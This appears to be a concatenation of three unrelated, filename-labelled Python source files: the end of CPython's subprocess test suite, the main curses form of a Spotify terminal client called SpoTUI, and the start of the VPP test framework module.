stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipIf(not ctypes, 'ctypes module required.')
@unittest.skipIf(not sys.executable, 'Test requires sys.executable.')
def test_child_terminated_in_stopped_state(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
PTRACE_TRACEME = 0 # From glibc and MacOS (PT_TRACE_ME).
libc_name = ctypes.util.find_library('c')
libc = ctypes.CDLL(libc_name)
if not hasattr(libc, 'ptrace'):
raise unittest.SkipTest('ptrace() required.')
test_ptrace = subprocess.Popen(
[sys.executable, '-c', """if True:
import ctypes
libc = ctypes.CDLL({libc_name!r})
libc.ptrace({PTRACE_TRACEME}, 0, 0)
""".format(libc_name=libc_name, PTRACE_TRACEME=PTRACE_TRACEME)
])
if test_ptrace.wait() != 0:
raise unittest.SkipTest('ptrace() failed - unable to test.')
child = subprocess.Popen(
[sys.executable, '-c', """if True:
import ctypes, faulthandler
libc = ctypes.CDLL({libc_name!r})
libc.ptrace({PTRACE_TRACEME}, 0, 0)
faulthandler._sigsegv() # Crash the process.
""".format(libc_name=libc_name, PTRACE_TRACEME=PTRACE_TRACEME)
])
try:
returncode = child.wait()
except Exception as e:
child.kill() # Clean up the hung stopped process.
raise e
self.assertNotEqual(0, returncode)
self.assertLess(returncode, 0) # signal death, likely SIGSEGV.
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises((FileNotFoundError, PermissionError)) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
MainForm.py | import sys
import time
import curses
from threading import Thread
from spotui.src.util import debounce
from spotui.src.Logging import logging
from spotui.src.spotifyApi import SpotifyApi
from spotui.src.TracksMenu import TracksMenu
from spotui.src.LibraryMenu import LibraryMenu
from spotui.src.PlaylistMenu import PlaylistMenu
from spotui.src.DeviceMenu import DeviceMenu
from spotui.src.SearchInput import SearchInput
from spotui.src.NowPlaying import NowPlaying
starttime = time.time()
class MainForm:
def __init__(self, stdscr):
self.stdscr = stdscr
self.api = SpotifyApi()
self.pause_updates = False
self.device_id = None
self.tracklist_uri = None
self.status = self.api.get_playing()
self.app_name = "SpoTUI"
# Events
self.events = {
155: self.handle_exit,
27: self.handle_exit,
ord("q"): self.handle_exit,
9: self.select_next_component,
curses.KEY_RESIZE: self.handle_resize,
ord("d"): self.show_device_menu,
ord("/"): self.show_search_bar,
ord(" "): self.toggle_playback,
ord("p"): self.previous_track,
ord("n"): self.next_track,
ord("s"): self.toggle_shuffle,
ord("r"): self.cycle_repeat,
curses.KEY_RIGHT: self.seek_forward,
curses.KEY_LEFT: self.seek_backward,
}
# window size
scry, scrx = self.stdscr.getmaxyx()
# UI components
self.components = [
TracksMenu(stdscr, self.api, self.play_track, self.status),
LibraryMenu(stdscr, self.api, self.change_tracklist),
PlaylistMenu(stdscr, self.api, self.change_tracklist),
NowPlaying(stdscr),
]
self.search_component = SearchInput(self.stdscr, self.api,
self.search)
self.device_menu_component = DeviceMenu(self.stdscr, self.api,
self.select_device,
self.hide_popup)
# Active component
self.active_component = 0
self.components[0].activate()
# Popups
self.popup = None
# Set initial tracklist
if self.status and 'context' in self.status and type(self.status["context"]) is dict and 'uri' in self.status["context"]:
self.change_tracklist(
self.api.get_playlist_tracks(self.status["context"]["uri"]), "Previous Session")
else:
self.change_tracklist(self.api.get_top_tracks(), "Top Tracks")
# Set initial device ID
devices = self.api.get_devices()
if self.status and 'device' in self.status and self.status["device"]["is_active"]:
self.device_id = self.status["device"]["id"]
else:
self.device_id = devices[0]["id"] if devices and len(
devices) > 0 else None
# Initial render
self.render()
# Poll playing status every second in a new thread
status_loop = Thread(target=self.status_loop)
status_loop.daemon = True
status_loop.start()
# Start the main event loop (used for responding to key presses and keeping the main process running)
while 1:
try:
if not self.pause_updates:
# capture and handle key press
key = self.stdscr.getch()
if key in self.events.keys():
# run the event handler for the key
self.events[key]()
elif self.popup:
# or pass it to the active popup
self.popup.receive_input(key)
else:
# or pass the input to the active component
self.components[self.active_component].receive_input(
key)
# re-render
self.render()
except KeyboardInterrupt:
sys.exit(0)
def status_loop(self):
while 1:
if not self.pause_updates:
self.status = self.api.get_playing()
self.components[0].refresh_now_playing(self.status)
self.render()
time.sleep(1 - ((time.time() - starttime) % 1))
def render(self):
self.stdscr.erase()
for component in self.components:
# render each component
component.render(self.status)
if self.popup:
self.popup.render()
self.stdscr.refresh()
# events
def change_tracklist(self, tracks, title, tracklist_uri=None):
self.components[0].update_tracks(tracks, title)
self.tracklist_uri = tracklist_uri
self.activate_tracklist()
def select_next_component(self):
if self.popup:
return
# visually de-activate the current component
self.components[self.active_component].deactivate()
# incremement the active component (or go back to start)
self.active_component = (
self.active_component +
1 if self.active_component < len(self.components) - 1 else 0)
# skip read-only components
if self.components[self.active_component].interactive:
self.components[self.active_component].activate()
else:
self.select_next_component()
def play_track(self, track):
if track['type'] == 'playlist':
self.change_tracklist(self.api.get_playlist_tracks(
track['id'] if track['id'] else track['uri']), track['name'], track['uri'])
return
if track['type'] == 'show':
self.change_tracklist(self.api.show_episodes(
track['id']), track['name'], track['uri'])
return
if self.device_id:
if self.tracklist_uri:
self.api.start_playback(self.device_id, None,
self.tracklist_uri, {"uri": track["uri"]})
else:
self.api.start_playback(
self.device_id,
list(map(self.__map_tracklist, filter(self.__filter_tracklist,
self.components[0].tracks))),
None,
{"uri": track["uri"]},
)
@debounce(0.5)
def toggle_playback(self):
if not self.device_id or not self.status:
return
if self.status["is_playing"]:
self.api.pause_playback(self.device_id)
self.status["is_playing"] = False
else:
self.api.start_playback(self.device_id)
self.status["is_playing"] = True
@debounce(0.5)
def previous_track(self):
if self.device_id and self.status and self.status["is_playing"]:
self.api.previous_track(self.device_id)
@debounce(0.5)
def next_track(self):
if self.device_id and self.status and self.status["is_playing"]:
self.api.next_track(self.device_id)
@debounce(1.5)
def toggle_shuffle(self):
status = self.api.get_playing()
if status:
self.api.shuffle(not bool(self.status["shuffle_state"]))
@debounce(1.5)
def cycle_repeat(self):
status = self.api.get_playing()
if status:
if status["repeat_state"] == "off":
self.api.repeat("track")
if status["repeat_state"] == "track":
self.api.repeat("context")
if status["repeat_state"] == "context":
self.api.repeat("off")
@debounce(2)
def seek_backward(self):
if self.device_id and self.status and self.status["is_playing"]:
progress = self.status["progress_ms"]
self.api.seek_track(self.device_id, progress - 10000)
@debounce(2)
def seek_forward(self):
if self.device_id and self.status and self.status["is_playing"]:
progress = self.status["progress_ms"]
self.api.seek_track(self.device_id, progress + 10000)
def search(self, query):
self.hide_popup()
query = query.strip()
if query and len(query) > 1:
results = self.api.search(query)
self.change_tracklist(results, "Searching: " + query)
self.render()
def activate_tracklist(self):
self.components[self.active_component].deactivate()
self.active_component = 0
self.components[self.active_component].activate()
@debounce(2)
def show_device_menu(self):
self.components[self.active_component].deactivate()
self.popup = self.device_menu_component
self.popup.restart()
self.popup.activate()
self.render()
def show_search_bar(self):
if self.popup:
return
self.pause_updates = True
self.popup = self.search_component
self.components[self.active_component].deactivate()
self.popup.activate()
self.render()
def select_device(self, device_id):
self.device_id = device_id
def hide_popup(self):
if self.popup:
self.popup.deactivate()
self.popup = None
self.components[self.active_component].activate()
self.pause_updates = False
self.stdscr.clear()
self.render()
def handle_resize(self):
for component in self.components:
# render each component
component.restart()
self.stdscr.clear()
def handle_exit(self):
if self.popup:
self.hide_popup()
else:
sys.exit(0)
def __filter_tracklist(self, track):
return track["type"] == 'track'
def __map_tracklist(self, track):
return track["uri"]
|
framework.py | #!/usr/bin/env python3
from __future__ import print_function
import gc
import logging
import sys
import os
import select
import signal
import unittest
import tempfile
import time
import faulthandler
import random
import copy
import psutil
import platform
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
import scapy.compat
from scapy.packet import Raw
import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
import vpp_papi
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_shmem import VppTransportShmemIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
if os.name == 'posix' and sys.version_info[0] < 3:
# using subprocess32 is recommended by python official documentation
# @ https://docs.python.org/2/library/subprocess.html
import subprocess32 as subprocess
else:
import subprocess
# Python2/3 compatible
try:
input = raw_input
except NameError:
pass
logger = logging.getLogger(__name__)
# Set up an empty logger for the testcase that can be overridden as necessary
null_logger = logging.getLogger('VppTestCase')
null_logger.addHandler(logging.NullHandler())
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
class BoolEnvironmentVariable(object):
def __init__(self, env_var_name, default='n', true_values=None):
self.name = env_var_name
self.default = default
self.true_values = true_values if true_values is not None else \
("y", "yes", "1")
def __bool__(self):
return os.getenv(self.name, self.default).lower() in self.true_values
if sys.version_info[0] == 2:
__nonzero__ = __bool__
def __repr__(self):
return 'BoolEnvironmentVariable(%r, default=%r, true_values=%r)' % \
(self.name, self.default, self.true_values)
debug_framework = BoolEnvironmentVariable('TEST_DEBUG')
if debug_framework:
import debug_internal
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
""" exception for reporting that the subprocess has died."""
signals_by_value = {v: k for k, v in signal.__dict__.items() if
k.startswith('SIG') and not k.startswith('SIG_')}
def __init__(self, rv=None, testcase=None, method_name=None):
self.rv = rv
self.signal_name = None
self.testcase = testcase
self.method_name = method_name
try:
self.signal_name = VppDiedError.signals_by_value[-rv]
except (KeyError, TypeError):
pass
if testcase is None and method_name is None:
in_msg = ''
else:
in_msg = 'running %s.%s ' % (testcase, method_name)
msg = "VPP subprocess died %sunexpectedly with return code: %d%s." % (
in_msg,
self.rv,
' [%s]' % (self.signal_name if
self.signal_name is not None else ''))
super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
while not testclass.pump_thread_stop_flag.is_set():
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.info(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.error(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the
# flag will take care of properly terminating the loop
def _is_skip_aarch64_set():
return BoolEnvironmentVariable('SKIP_AARCH64')
is_skip_aarch64_set = _is_skip_aarch64_set()
def _is_platform_aarch64():
return platform.machine() == 'aarch64'
is_platform_aarch64 = _is_platform_aarch64()
def _running_extended_tests():
return BoolEnvironmentVariable("EXTENDED_TESTS")
running_extended_tests = _running_extended_tests()
def _running_gcov_tests():
return BoolEnvironmentVariable("GCOV_TESTS")
running_gcov_tests = _running_gcov_tests()
def _running_on_centos():
os_id = os.getenv("OS_ID", "")
return True if "centos" in os_id.lower() else False
running_on_centos = _running_on_centos()
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
self._pipe = None
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if self._pipe is not None:
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test, desc=None):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = '%s (%s)' % (desc, unittest.util.strclass(test))
else:
desc = test.id()
self.pipe.send((desc, test.vpp_bin, test.tempdir, test.vpp.pid))
class VppTestCase(unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
classes. It provides methods to create and run test case.
"""
extra_vpp_punt_config = []
extra_vpp_plugin_config = []
logger = null_logger
vapi_response_timeout = 5
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def force_solo(cls):
""" if the test case class is timing-sensitive - return true """
return False
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.gdbserver_port = 7777
cls.debug_core = False
